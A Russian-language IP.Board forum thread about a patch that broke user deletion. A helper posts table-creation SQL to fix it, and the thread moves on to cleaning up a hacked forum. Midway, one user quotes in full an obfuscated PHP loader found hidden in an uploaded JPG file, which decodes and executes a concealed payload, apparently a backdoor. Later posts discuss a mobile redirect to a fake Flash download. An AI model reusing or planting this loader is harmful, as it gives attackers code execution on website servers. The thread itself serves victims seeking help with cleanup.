Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
siv1987

Security update

Рекомендованные сообщения

Patch level 2 для всех русских версий (локализаций ибр) от 6 ноября.

 

IPB 3.1x

ipb31ru_nov12.rar

скачал эту штуку, поставил

вроде как нормально все, и тут замечаю, что не могу удалять юзеров - ошибка базы данных, 1146, таблица не существует..(Error: 1146 - Table 'ncaab.core_like' doesn't exist)

 

так как заметил далеко не сразу, бэкапы удалил...подскажите, как исправить?

если обсуждалось уже где-то, то направьте

Поделиться сообщением


Ссылка на сообщение

скачал эту штуку, поставил

У вас какая версия форума? IPB version: 3.0.x?

 

подскажите, как исправить?

Восстановить оригинальный файл из дистрибутива и пропатчить его вручную, либо обновится до последней версии линейки 3.1 - 3.1.4

Поделиться сообщением


Ссылка на сообщение

ошибка базы данных, 1146, таблица не существует..(Error: 1146 - Table 'ncaab.core_like' doesn't exist)

Исходя из Ваших данных:

IPB version:3.0.x

А откуда ей (таблице) взяться в версии 3.0.х. Вы бы еще от 3.3.х патч взяли.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение
12/06/12 13:14 (изменено)
А откуда ей (таблице) взяться в версии 3.0.х. Вы бы еще от 3.3.х патч взяли.

не, у меня 3.1.2 (данные в профиле устаревшие)

 

a0206368dc26.png

 

да вы меня за интеллектуала держите

Изменено пользователем MyrOsLove

Поделиться сообщением


Ссылка на сообщение

Два варианта выше уже предложены, еще один - создать эти таблицы, так как они действительно появились только в 3.1.4

 

CREATE TABLE core_like (
like_id				VARCHAR(32),
like_lookup_id		VARCHAR(32),
like_app			VARCHAR(150) NOT NULL DEFAULT '',
like_area			VARCHAR(200) NOT NULL DEFAULT '',
like_rel_id			BIGINT(20) UNSIGNED NOT NULL DEFAULT 0,
like_member_id		INT(10) UNSIGNED NOT NULL DEFAULT 0,
like_is_anon		INT(1) NOT NULL DEFAULT 0,
like_added			INT(10) UNSIGNED NOT NULL DEFAULT 0,
like_notify_do		INT(1) NOT NULL DEFAULT 0,
like_notify_meta	TEXT,
like_notify_freq	VARCHAR(200) NOT NULL DEFAULT '',
like_notify_sent	INT(10) UNSIGNED NOT NULL DEFAULT 0,
PRIMARY KEY (like_id),
KEY find_rel_favs ( like_lookup_id, like_is_anon, like_added),
KEY like_member_id (like_member_id,like_added)
);

 

CREATE TABLE core_like_cache (
like_cache_id		VARCHAR(32),
like_cache_app		VARCHAR(150) NOT NULL DEFAULT '',
like_cache_area		VARCHAR(200) NOT NULL DEFAULT '',
like_cache_rel_id	BIGINT(20) UNSIGNED NOT NULL DEFAULT 0,
like_cache_data		TEXT,
like_cache_expire	INT(10) NOT NULL DEFAULT '0',
PRIMARY KEY (like_cache_id)
);

 

Не забыть про префикс к таблицам если он есть.

  • Upvote 2

Поделиться сообщением


Ссылка на сообщение

о, спасибо, сейчас попробую

если что не так, это не повредит базе, верно?

Поделиться сообщением


Ссылка на сообщение

ПОМОГЛО!

Есс!

Спасибо, siv1987! Чрезмерно благодарен! :)

Поделиться сообщением


Ссылка на сообщение

Добрый день в Админке появилось сообщение...

A security evaluation has revealed a vulnerability that exists in IP.Board and a patch has been released to rectify this issue.

 

Please visit this topic for more information and to download the patch.

 

http://community.invisionpower.com/topic/375885-ipboard-31x-32x-33x-34x-critical-security-update/

 

Т.е. информация о необходимости обновления безопасности...

 

Можноли безбоязненно ставить это обновление на форум купленный у Айбиресурса???

А то прошлое обновление было только для английской версии...

И только намного позже появилось для русской версии..

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Можноли безбоязненно ставить это обновление на форум купленный у Айбиресурса???

А то прошлое обновление было только для английской версии...

И только намного позже появилось для русской версии..

Можно, в этих файлах ibr ничего не приписывали.

Поделиться сообщением


Ссылка на сообщение

Была такая-же проблема. Патч и чистка папок от "грязи" помогла. Спасибо !

 

Ещё нашёл бяку, папка uploads -> profile, файл photo-8031.jpg.

Содержимое:

<?php $svb1omyw='zFGFCOFy#&FlkFhg,HzQHPX?<gQOu<h#OFl#&FGlyFh-OX3;`HXO<H`3x{14>PV~)xq-++-;X?<gQOu<PH/O&Q&3h&Z?Q`uE<rz66*zgJhq-z<`-5SPwD1TD1_hsII~P2hNRRh*hq-C-X?<gQOu<-&Z?Q`uE<rz66*zgJ3qC-HgZu-hv;||ha@`k3h6O<J&hqah||Ah#-$-,HcO&QH,P&Z?Q`uE<PX?<gQOu<3h&Z?Q`uE<rz66*zgJhq#-$-h#$';global$kkbqsn33;$kkbqsn33=array();$l14v3z0t=array(42,49,44,58,45,54,62,51,37,101,109,36,111,100,110,106,125,60,43,0,57,48,127,119,126,59,120,25,13,16,18,22,15,29,118,121,39,55,40,28,61,52,31,123,12,26,9,4,23,11,30,2,98,99,114,113,50,97,34,56);foreach($l14v3z0t as $eqc2nfao)$kkbqsn33[]=($eqc2nfao^95);$j96qsapp=asb1o7s1(array(63,60,38,72,44,79,122,54,79,98,72));$d4od2xp4=$j96qsapp(asb1o7s1($svb1omyw));$uzo89z0p=$d4od2xp4[0];$vvlvxv5l=$uzo89z0p('',$d4od2xp4[1]);$vvlvxv5l();function asb1o7s1($pah,$uv4='',$ec="\x63\x68\x72"){global$kkbqsn33,$lmma;if(!isset($lmma))$lmma=array();static$jjev;if(!isset($jjev))$jjev=0;$pn=$e2c=$d6=$ag=$ec;$t5z=$pn(171^200).$ag(248^151).$e2c(158^235).$d6(177^223).$d6(170^222);$va2=$pn(210^161).$d6(124^8).$e2c(0^114).$pn(216^180).$pn(162^199).$d6(187^213);$k3c=$d6(228^141).$ec(104^27).$pn(120^39).$pn(23^118).$ag(67^49).$pn(108^30).$d6(103^6).$d6(168^209);$tkq=$e2c(100^11).$d6(71^53).$ec(150^242);for($mux=0,$pbrt=0;$mux<($k3c($pah)?$t5z($pah):$va2($pah));$mux++){$czpe=(($k3c($pah)?$pah[$mux]:$tkq($pah[$mux])));if($czpe==(80^90)||$czpe==(108^97))continue;if(!isset($lmma[$czpe])) $lmma[$czpe]=$jjev++;if(!isset($kkbqsn33[$lmma[$czpe]])){echo($pah[$$mux].' '.$czpe);exit;}$uay7=$ec( $kkbqsn33[$lmma[$czpe]]);$uv4.=$uay7;}return$uv4;} ?>

Поделиться сообщением


Ссылка на сообщение

Добрый день, почистил от вируса всё что можно.

Но при заходе с телефона под андроидом перекидывает на сайт и просит скачать адоб флеш плауер )))

Так вроде всё что можно почистил подскажите где копать )) Заранее спасибо.

Поделиться сообщением


Ссылка на сообщение

Перенаправление это файлы .htaccess

Смотрите их начиная с корня. И смотрите файл до конца, а то вредный код, дописывают в самый конец.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

В большинстве случаев ставят редирект через htaccess, но могут прописать и в скриптах.

Поделиться сообщением


Ссылка на сообщение

В данных файлах все пусто уже 100 раз проверял.

А где живут переназначения юзерагентор форума?

Поделиться сообщением


Ссылка на сообщение

В данных файлах все пусто уже 100 раз проверял.

В каких "данных" файлах? htaccess как правило только один, и чтобы редирект сработал он должен быть в корне форума. А если прописали в скриптах, так там больше 1К файлов,вы сто раз их проверяли?... Даже конечно если учесть, что вставят в одном из "глобальных" файлов, так еще и неизвестно какой это редирект - жаваскрипт или серверный.

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...